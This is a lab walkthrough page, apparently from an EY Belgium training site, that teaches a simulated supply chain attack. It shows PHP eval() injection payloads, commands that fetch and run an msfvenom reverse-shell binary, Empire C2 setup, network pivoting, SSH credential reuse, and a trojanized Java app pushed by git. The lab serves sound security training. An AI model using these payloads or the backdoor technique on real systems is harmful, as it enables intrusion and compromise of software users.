<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">

    <title>SecuritEY</title>
    <meta content="" name="description">
    <meta content="" name="keywords">

    <!-- Favicons -->
    <link href="https://assets.ey.com/etc/designs/zg/eydff/desktop/assets/img/favicon.ico" rel="icon">
    <link href="https://assets.ey.com/etc/designs/zg/eydff/desktop/assets/img/favicon.ico" rel="apple-touch-icon">

    <!-- Google Fonts -->
    <link
        href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i"
        rel="stylesheet">

    <!-- Vendor CSS Files -->
    <link href="/vendor/aos/aos.css" rel="stylesheet">
    <link href="/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
    <link href="/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
    <link href="/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
    <link href="/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
    <link href="/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">

    <link rel="stylesheet" href="/css/highlight.css">
    <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.7.1/highlight.min.js"></script>
    <script>hljs.initHighlightingOnLoad();</script>

    <!-- Template Main CSS File -->
    <link href="/css/sca.css" rel="stylesheet">


    <!-- =======================================================
    * Template Name: iPortfolio - v3.0.1
    * Template URL: https://bootstrapmade.com/iportfolio-bootstrap-portfolio-websites-template/
    * Author: BootstrapMade.com
    * License: https://bootstrapmade.com/license/
    ======================================================== -->
</head>

<body>

<!-- ======= Mobile nav toggle button ======= -->
<i class="bi bi-list mobile-nav-toggle d-xl-none"></i>

<!-- ======= Header ======= -->
<header id="header">
    <div class="d-flex flex-column">

        <div class="profile">
            <img src="/img/hacker.jpg" alt="" class="img-fluid rounded-circle">
            <h1 class="text-light"><a href="/">SecuritEY</a></h1>
            <div class="social-links mt-3 text-center">
                <a href="https://twitter.com/ey_belgium" class="twitter"><i class="bx bxl-twitter"></i></a>
                <a href="https://www.facebook.com/eybelgium" class="facebook"><i class="bx bxl-facebook"></i></a>
                <a href="https://www.instagram.com/ey_belgium" class="instagram"><i class="bx bxl-instagram"></i></a>
                <a href="https://www.linkedin.com/company/ernstandyoung" class="linkedin"><i class="bx bxl-linkedin"></i></a>
            </div>
        </div>

        <nav id="navbar" class="nav-menu navbar">
            <ul>
                <li><a href="#hero" class="nav-link scrollto active"><i class="bx bx-home"></i> <span>Home</span></a>
                </li>
                <li><a href="#about" class="nav-link scrollto"><i class="bx bx-code-block"></i> <span>About</span></a>
                </li>
                <li><a href="#facts" class="nav-link scrollto"><i class="bx bx-book-content"></i>
                        <span>Guidelines</span></a></li>
                <li><a href="#portfolio" class="nav-link scrollto"><i class="bx bx-network-chart"></i>
                        <span>Walkthrough</span></a></li>
                <li><a href="#services" class="nav-link scrollto"><i class="bx bx-bookmark-alt"></i>
                        <span>Keynotes</span></a>
                </li>
                <li><a href="/home" class="nav-link scrollto"><i class="bx bx-caret-left-square"></i>
                        <span>Back</span></a>
                </li>
            </ul>
        </nav><!-- .nav-menu -->
    </div>
</header><!-- End Header -->

<!-- ======= Hero Section ======= -->
<section id="hero" class="d-flex flex-column justify-content-center align-items-center">
    <div class="hero-container">
        <h1>Supply Chain Attacks</h1>
        <p><span class="typed" data-typed-items="SolarWinds, British Airways, Passwordstate"></span></p>
    </div>
</section><!-- End Hero -->

<main id="main" class="mb-4">

    <!-- ======= About Section ======= -->
    <section id="about" class="about">
        <div class="container">
            <div class="callout callout-warning">
                <h4>&#x26a0;&#xfe0f; Warning: Time consuming</h4>
                This lab takes some time to build. After pressing the start button, wait until the HelloJava website
                loads to
                connect to your hacking vm. <br>This can take up to 20 minutes.
            </div>

            <div class="section-title">
                <h2>About</h2>
                <p>In December 2020, with much of the world distracted by a Covid-19 resurgence and the aftermath of the
                    US presidential election, security researchers were busy tracking a new malware campaign – UNC2452 –
                    which had grave implications for cybersecurity in the western world. <br><br>

                    Subsequently linked with Russian state-sponsored cybercrime gang APT29 (or Cozy Bear) the attack
                    ‘trojanized’ software updates to Orion, an IT monitoring and management application from SolarWinds.
                    <br><br>
                    Researchers from FireEye, the campaign’s first high-profile victim, discovered that hackers had
                    turned part of Orion into a back door that communicated with third-party servers. FireEye named the
                    Trojanized plug-in – a standard Windows installer patch file – ‘SUNBURST’. This is now knows as the
                    SolarWinds Supply Chain Attack.</p>
            </div>

            <div class="row">
                <div class="col-lg-4">
                    <img
                        src="https://images.unsplash.com/photo-1520509414578-d9cbf09933a1?ixid=MnwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8&ixlib=rb-1.2.1&auto=format&fit=crop&w=949&q=80"
                        class="img-fluid" alt="">
                </div>
                <div class="col-lg-8 pt-4 pt-lg-0 content" {{-- data-aos="fade-left"--}}>
                    <h3>How does it work?</h3>
                    <p>
                        A supply chain attack, also called a value-chain or third-party attack, occurs when someone
                        infiltrates your system through an outside partner or provider with access to your systems and
                        data. This has dramatically changed the attack surface of the typical enterprise in the past few
                        years, with more suppliers and service providers touching sensitive data than ever before.


                    </p>
                    <p>
                        The danger of a supply chain attack is that it doesn't have to be directly related to how secure
                        your network or application is. If you use a certain component from any other company in the
                        service or product you offer, you trust that that component is secure. You trust that the
                        company that offers that company has taken all the right measures to secure their own company.
                        But from the moment you use their product or service yourself, you rely on that and when they
                        get compromised and their product or service gets compromised, it can directly affect your
                        clients. That right there is the danger, you can take all the right precautions and still get
                        hacked because someone else got unlucky.
                    </p>
                    <div>
                        <div class="CustomButton mr-4">
                            <a href="/sca/start" class="btn-get-started mr-5">Start</a>
                        </div>
                        <div class="CustomButton pl-3">
                            <a href="/sca/stop" class="btn-get-stopped">Stop</a>
                        </div>
                    </div>
                </div>
            </div>

        </div>
    </section><!-- End About Section -->

    <!-- ======= Facts Section ======= -->
    <section id="facts" class="facts section-bg">
        <div class="container">
            <div class="section-title">
                <h2>Guidelines</h2>
                <p>In this module there are <code>4</code> targets to compromise. You will get SSH access to an Ubuntu
                    VM
                    (<code>h4ck3r:3Y_h4ck5!</code>)
                    with Empire C2 and Metasploit installed. The goal is to collect all 4 targets as agents in your
                    empire C2 server. <br><br> You can choose to practice the module by yourself or read how to do it
                    below. Your initial target is <code>sca-web.westeurope.cloudapp.azure.com</code>. The other 3
                    targets will become obvious after this. You can also take a look at the topology below. If anything
                    were to go wrong, you can always stop and
                    rebuild the infrastructure for a fresh start.</p>
            </div>
        </div>
    </section><!-- End Facts Section -->
    <img src="/img/sca-topology.png" width="100%" alt="">

    <!-- ======= Portfolio Section ======= -->
    <section id="portfolio" class="portfolio">
        <div class="container">

            <div class="section-title">
                <h2>Walkthrough</h2>
                <p>Time to actually start hacking. Connect to your Ubuntu VM using the credentials mentioned above.
                    You'll notice that Metasploit is available, as is Empire. You can take a look at <code
                        style="color: red"><a href="http://sca-web.westeurope.cloudapp.azure.com" style="color: red">sca-web.westeurope.cloudapp.azure.com</a></code>
                    and try to discover the site a bit. The address of the hacking vm is <code
                        style="color: red">sca-hack.westeurope.cloudapp.azure.com</code><br>
                    A good first practice would be to run an nmap scan and a gobuster scan:
                </p>
            </div>
            <pre><code class="language-bash">
  # get the IP (also do this for the hacking vm to know your own IP)
  dig sca-web.westeurope.cloudapp.azure.com

  # Check for open ports
  nmap -A $ip

  # Bruteforce directories and files
  gobuster dir -u http://sca-web.westeurope.cloudapp.azure.com -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,txt,html
          </code></pre>
            <p>The scan will give you little to no results. The first part is just a webapp vulnerability. Since there
                are no other files to explore and there isn't much on the website it's pretty obvious the only thing
                that we can interact with is the contact form. </p>
            <h4>1. Attacking the websever</h4>
            <p>
                Somewhere on the page the word evaluate is used. This is a hint to PHP's eval() function that's used to
                concatenate your name to the error message from the form. The eval() function is known to be vulnerable
                to RCE.
                <br>
                If you take a simple example you'll quickly find that the eval() function is used like this:
            </p>
            <pre><code class="language-bash">
  $string = "beautiful";
  $time = "winter";

  $str = 'This is a $string $time morning!';
  echo $str. "&lt;br&gt;";

  eval("\$str = \"$str\";");
  echo $str;
          </code></pre>
            <p>
                So if there is no input filtering in place you can escape the quotes, run something else and comment out
                the rest of the code.
                <br>Try submitting the following payload as your name:
            </p>
            <pre><code class="language-php">
  "; echo exec('id'); //
          </code></pre>
            <p>
                You'll get the output of the command <code>id</code>. So we could use this to upload a payload and get
                a reverse shell.
                <br>
                On the Ubuntu VM use the following line to create a reverse shell payload using MSFVenom (some setup may
                be required, just type yes and then enter). Replace the
                IP with your own and replace port with whichever one you want, 1234 for example:
            </p>
            <pre><code class="language-bash">
  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f elf -o payload1.bin
          </code></pre>
            <p>In a new tab open up Metasploit by typing in <code>msfconsole</code>. Some setup may be required, just
                type yes or enter as they ask. After this booted up run the following commands to set up a listener
                (with your own IP and port ofcourse):</p>
            <pre><code class="language-bash">
  use multi/handler
  set LHOST $IP
  set LPORT $PORT
  set payload linux/x86/meterpreter/reverse_tcp
  run
          </code></pre>
            <p>Then in another tab go to the Empire directory and get empire ready with the following commands:</p>
            <pre><code class="language-bash">
  sudo ./empire
  listeners
  uselistener http
  set Host http://$IP
  set Name SCA
  set Port $choose_a_new_PORT
  execute
          </code></pre>
            <p>We are now ready to execute the payload. Go back to the tab where you used MSFVenom and run <code>python
                    -m SimpleHTTPServer</code>, this will let you serve files on <code style="color: #0a58ca">http://yourip:8000/</code>.
                Then submit to following lines as payloads one after the other to retrieve the payload and execute it:
            </p>
            <pre><code class="language-text" style="color: #b9ca4a">
  "; echo exec('wget http://your_ip:8000/payload1.bin'); //
  "; echo exec('chmod +x payload1.bin'); //
  "; echo exec('./payload1.bin'); //
          </code></pre>
            <p>This will result in a hit on your meterpeter listener. You can play around with the commands or type
                <code>shell</code> to get a real shell. Use this to take a look around, look at some files you normally
                can't access, contact.php maybe?
            </p>
            <p>To add the machine to our C2 server, go back to the tab with empire open and do the following:
            </p>
            <pre><code class="language-bash">
  main
  usestager multi/bash
  set Listener SCA
  execute
          </code></pre>
            <p>Copy the payload and execute it in a shell with the web server. Confirm it worked by listing the agents
                with the command <code>agents</code>.</p>
            <br>
            <h4>2. Pivot</h4>
            <p>While connected to the meterpreter shell, run <code>ipconfig</code>, you'll see that are two network
                cards, one with localhost and one with a private IP. We can use meterpreter to pivot through the network
                and discover other machines using the following commands:</p>
            <pre><code class="language-bash">
  run autoroute -s 172.16.0.0/24
  background
  use auxiliary/scanner/portscan/tcp
  set RHOSTS 172.16.0.0/24
  set threads 100
  run
          </code></pre>
            <p>The portscan will come up with three results, port 80 and 22 on <code>172.16.0.10</code> and port 22 on
                <code>172.16.0.20</code>. This means that SSH is open on a machine we just discovered. <br>
                If you took the time to do some reconnaissance on the web server, you would've found that in contact.php
                the developer's left a note. They were aware that the contact form didn't work yet so they left the
                credentials for the mail it should be configured with. <br>
                A big problem within companies and with people in general is password reuse. By now you can probably
                guess where this is going. The issue is, if we go to the meterpreter connection and type
                <code>shell</code>, you'll notice this shell isn't strong enough to use SSH (use <code>sessions -i
                    1</code> to interact with the web server again). Lets' fix this. <br><br>
                In a new tab set up a netcat listner with <code>nc -nlvp 4444</code> and replace 4444 with whichever
                port you want that is not in use yet. Then grab the meterpreter connection and get a shell. Verify that
                python is installed with the command <code>python -V</code>. It should be installed so now you can grab
                the python reverse shell oneliner from
                <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" style="color: #0b5ed7">pentestmonkey</a>,
                adjust the IP and port value accordingly and execute it. This will give you a hit on the listener you
                just set up. To upgrade the shell do the following:
            </p>
            <pre><code class="language-bash">
  python -c 'import pty; pty.spawn("/bin/bash")'
          </code></pre>
            <p>With the shell we received we can now SSH to the newly discovered machine to try credential reuse. You
                will now have access to the app server of HelloJava. Execute the empire payload again to add the new
                server to our compromised machines on the C2 server.</p>
            <p>Take some time to look around, use commands like <code>ls -al</code> to find hidden files and to see what
                you-re working with. Hopefully you'll find out pretty soon that you're working with a GitHub directory
                and that our victim provides a Java app. We can adjust the java code to retrieve and execute a payload
                when the clients execute it.</p>
            <h4>3. Clients</h4>
            <p>We have now hacked our way into a company to delivers Java applications to its clients. We will now try
                to
                also hack these clients by adding some malicious code to the application. The way we can do this is
                putting
                the empire payload in a file and adding this to to repository, we can then write some Java code to make
                it
                executable and execute it. <br><br>
                First, take the payload for empire from earlier and paste it into a file, lets call it
                <code>empire.sh</code>. At this point we will be altering the Java application with <code>vi</code>, but
                you might have some issues with arrow keys and such, to solve this execute the below commands. Your
                input might look a bit scrambled at first, but eventually you'll get your connection back and all of
                your input will be sent directly through your shell.
            </p>
            <pre><code class="language-bash">
  ctrl + z
  stty raw -echo
  fg
  reset
          </code></pre>
            <p>Now you can edit the file with the command <code>vi HelloWorld.java</code>. We'll edit the file like
                this (first type <code>i</code> to enter insert mode, then when you adjusted the file hit
                <code>esc</code> and <code>:wq!</code> and enter):</p>
            <pre><code class="language-java">
  import java.io.*;

  public class HelloWorld {
     public static void main(String[] args) throws IOException {
        System.out.println("Hello World!");
        Process process = Runtime.getRuntime().exec("chmod +x empire.sh");
        Process process2 = Runtime.getRuntime().exec("./empire.sh");
     }
  }
          </code></pre>
            <p>Download the <code>empire.sh</code> file into the HelloJava directory using <code>wget</code> and <code>python&nbsp;-m&nbsp;SimpleHTTPServer</code>
                like we did before. We now have a payload and some malicious code that will execute said payload in this
                repository. The reason this will work lies in the <code>.gitignore</code>. As you can see, the files
                that are not the compiled app, are ignored and will not be pushed. But it's just the known Java files
                that are listed so our payload will be pushed. The last steps we need to do now is to compile our app
                again and then push it. To compile the app do the following:</p>
            <pre><code class="language-bash">
  javac -d . HelloWorld.java
  jar -cvmf MANIFEST.MF HelloJava.jar HelloWorld.class
          </code></pre>
            Now just push everything:

            <pre><code class="language-bash">
  git add .
  git commit -m "New update"
  git push
          </code></pre>
            <p>If you wait a few minutes the clients should pop up in your empire overview, you can list them with the
                command <code>agents</code> and interact with them by typing <code>interact <span
                        style="font-style: italic">name</span></code>.</p>
        </div>
    </section><!-- End Portfolio Section -->

    <!-- ======= Services Section ======= -->
    <section id="services" class="services section-bg">
        <div class="container">
            <div class="section-title">
                <h2>Keynotes</h2>
                <p>By completing the above module I hope that you think a bit more about the following:</p><br>
                <ul>
                    <li>A small vulnerability can have a big impact</li>
                    <li>Password reuse is a severe issue</li>
                    <li>Relying on a third party can be a big liability</li>
                </ul>
                Supply chain attacks are happening more and more. The best way to protect ourselves against it is by
                better understanding how they work. As you experienced in the module, a small flaw can have a very big
                impact. Passwords that are reused are a big security issue and writing them down, even where normally
                nobody should be able to see them, is a no go.
            </div>
        </div>
    </section><!-- End Services Section -->
    <div class="col-7 mt-6">
        <div class="pt-5 pb-5 rounded">
            <div class="row no-gutters justify-content-center text-center text-sm-left">
                <div class="col-6 col-sm-4 col-md-3 col-lg-4 col-xl-3 align-self-center pr-sm-3 pb-3 pb-sm-0"><img
                        class="rounded-circle img-fluid" src="/img/mecrop.jpg" alt=""></div>
                <div class="col-sm ">
                    <h5>Mickey De Baets</h5>
                    <p class="text-sans-serif">I'm a student Cloud & Cyber Security @ Thomas More Geel with a passion
                        for security and Red Teaming. I've always been focussed on helping other people develop new
                        skills. </p><a class="text-sans-serif fs--1 font-weight-black text-black" target="_blank" href="https://mickeydebaets.be">mickeydebaets.be</a>
                </div>
            </div>
        </div>
    </div>
</main><!-- End #main -->

<a href="#" class="back-to-top d-flex align-items-center justify-content-center"><i
        class="bi bi-arrow-up-short"></i></a>

<!-- Vendor JS Files -->
<script src="/vendor/aos/aos.js"></script>
<script src="/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<script src="/vendor/glightbox/js/glightbox.min.js"></script>
<script src="/vendor/isotope-layout/isotope.pkgd.min.js"></script>
<script src="/vendor/php-email-form/validate.js"></script>
<script src="/vendor/purecounter/purecounter.js"></script>
<script src="/vendor/swiper/swiper-bundle.min.js"></script>
<script src="/vendor/typed.js/typed.min.js"></script>
<script src="/vendor/waypoints/noframework.waypoints.js"></script>

<!-- Template Main JS File -->
<script src="/js/main2.js"></script>

</body>

</html>
